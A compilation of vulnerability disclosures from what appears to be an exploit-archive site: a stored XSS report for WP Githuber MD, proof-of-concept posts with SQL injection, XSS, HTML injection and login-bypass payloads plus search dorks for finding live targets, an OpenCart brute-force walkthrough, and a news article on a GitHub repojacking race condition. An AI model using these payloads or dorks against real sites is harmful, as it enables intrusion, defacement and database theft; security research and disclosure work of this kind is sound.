Cross Site Scripting vulnerability in WP Githuber MD plugin v.1.16.2 allows a remote attacker to execute arbitrary code via a crafted payload to the new article function.

When I used this plugin to write MD articles, I encountered a stored XSS vulnerability

Steps to reproduce the behavior:

1.  Enable WP Githuber MD v1.16.2 plugin
    
2.  Write new articles (via MD editor of this plugin)
    
3.  Insert the following JS code:（Note that I added Tab spaces！！！）
    
    </textarea><script>alert('aaa hack');</script>
    
4.  Publish articles
    

**Additional context**

（Note that I added Tab spaces！！！），，，As an article, it should not take the content of the article as js code and let the client browser execute it, which is very dangerous and may lead to phishing

**Server environment**

*   WordPress version \[ 6.3 \]
*   WP Githuber MD plugin version \[ 1.16.2 \]
*   PHP version \[ 7.4 \]

CVE-2023-41423: There is a stored XSS vulnerability · Issue #316 · terrylinooo/githuber-md

Equipment Rental Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Equipment Rental Script-1.0 - SQLi## Author: nu11secur1ty## Date: 09/12/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The package_id parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the package_id parameter, anda database error message was returned. You should review the contentsof the error message, and the application's handling of other input,to confirm whether a vulnerability is present. The attacker can stealall information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: package_id=(-4488))) OR 1 GROUP BYCONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0END)),0x7176717671,FLOOR(RAND(0)*2)) HAVINGMIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)## Time spent:00:25:00

Equipment Rental Script 1.0 SQL Injection

Kolifa Download CMS version 1.2 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Kolifa Download CMS v1.2 HTML Inject Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.scriptmafia.org                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : arama.php?dwbaslik=%3Cmarquee%3E%3Cfont+color%3Dlime+size%3D32%3EHacked+by+indoushka%3C%2Ffont%3E%3C%2Fmarquee%3E&ara=Ara[+] http://127.0.0.1/Kolifa/arama.php?dwbaslik=%3Cmarquee%3E%3Cfont+color%3Dlime+size%3D32%3EHacked+by+indoushka%3C%2Ffont%3E%3C%2Fmarquee%3E&ara=AraGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Kolifa Download CMS 1.2 HTML Injection

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

KALIMATAN GMS 1.0.0 Cross Site Scripting

Kylin CMS version 1.3.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : KylinCMS V1.3.0 Auth by pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://m.facebook.com/p/Kylin-Infotech-100064768127857/                                                           |  | # Dork      : Designed & Developed by Kylin Infotech                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] P@n3L : http://127.0.0.1/engprogrammein/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Kylin CMS 1.3.0 SQL Injection

Kaledo RD CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Kalédo RD CMS va1.0 SQL Injection vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.kaledo.fr                                                                                               || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : cardetails.php?id=1 [+] use payload : http://www1.127.0.xcauxchateauxdusudouestcom/cardetails.php?id=1 (inject her)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Kaledo RD CMS 1.0 SQL Injection

DedeCMS 5.7.102 has a File Upload vulnerability via uploads/dede/module_make.php.

CVE-2023-40784

OpenCart v4.0.2.2 is vulnerable to Brute Force Attack.

    # Exploit Title: OpenCart CMS v4.0.2.2 Login Vulnerability# Date: 5-9-2023# Category: Web Application [CMS]# Exploit Author: Rajdip Dey Sarkar# Version: 4.0.2.2# Tested on: Windows/Kali# CVE: CVE-2023-40834Description:----------------OpenCart CMS version 4.0.2.2 is susceptible to login brute-force attacks,where attackers can repeatedly try to guess login credentials without anyprotective mechanisms in place.Vulnerable Parameter:-----------------------`Password`Steps to reproduce:---------------------> Initial Login Attempt: An attacker visits the login page `http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb`<http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb>andenters a valid username along with an incorrect password to trigger anauthentication attempt.> Request Capture: The attacker intercepts the HTTP request sent to theserver during the failed login attempt using tools like proxy servers. Thiscaptured request contains the authentication details.> Request Modification: The attacker uses a tool like "Intruder" toautomate the process of submitting multiple password variations. Theymodify the captured request to include different passwords, including thecorrect one, to be used in the brute force attack.> Brute Force Attack: The attacker launches the brute force attack bysending the modified requests with different password combinations to theserver. They analyze the responses to identify differences in responselengths or messages that reveal the correct password, account lockoutinformation, or other vulnerabilities.

CVE-2023-40834: OpenCart CMS 4.0.2.2 Brute Force ≈ Packet Storm

A new vulnerability disclosed in GitHub could have exposed thousands of repositories at risk of repojacking attacks, new findings show.
The flaw "could allow an attacker to exploit a race condition within GitHub's repository creation and username renaming operations," Checkmarx security researcher Elad Rapoport said in a technical report shared with The Hacker News.
"Successful exploitation of

Software Security / Vulnerability

A new vulnerability disclosed in GitHub could have exposed thousands of repositories at risk of repojacking attacks, new findings show.

The flaw "could allow an attacker to exploit a race condition within GitHub's repository creation and username renaming operations," Checkmarx security researcher Elad Rapoport said in a technical report shared with The Hacker News.

"Successful exploitation of this vulnerability impacts the open-source community by enabling the hijacking of over 4,000 code packages in languages such as Go, PHP, and Swift, as well as GitHub actions."

Following responsible disclosure on March 1, 2023, the Microsoft-owned code hosting platform has addressed the issue as of September 1, 2023.

Repojacking, short for repository hijacking, is a technique where a threat actor is able to bypass a security mechanism called popular repository namespace retirement and ultimately control of a repository.

What the protection measure does is prevent other users from creating a repository with the same name as a repository with more than 100 clones at the time its user account is renamed. In other words, the combination of the username and the repository name is considered "retired."

Should this safeguard be trivially circumvented, it could enable threat actors to create new accounts with the same username and upload malicious repositories, potentially leading to software supply chain attacks.

The new method outlined by Checkmarx takes advantage of a potential race condition between the creation of a repository and the renaming of a username to achieve repojacking. Specifically, it entails the following steps -

1.  Victim owns the namespace "victim\_user/repo"
2.  Victim renames "victim\_user" to "renamed\_user"
3.  The "victim\_user/repo" repository is now retired
4.  A threat actor with the username "attacker\_user" simultaneously creates a repository called "repo" and renames the username "attacker\_user" to "victim\_user"

The last step is accomplished using an API request for repository creation and a renamed request interception for the username change. The development comes nearly nine months after GitHub patched a similar bypass flaw that could open the door to repojacking attacks.

"The discovery of this novel vulnerability in GitHub's repository creation and username renaming operations underlines the persistent risks associated with the 'popular repository namespace retirement' mechanism," Rapoport said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical GitHub Vulnerability Exposes 4,000+ Repositories to Repojacking Attack

Improper encoding or escaping of output in Wing FTP Server (User Web Client) allows Cross-Site Scripting (XSS).This issue affects Wing FTP Server: <= 7.2.0.



Tag

#php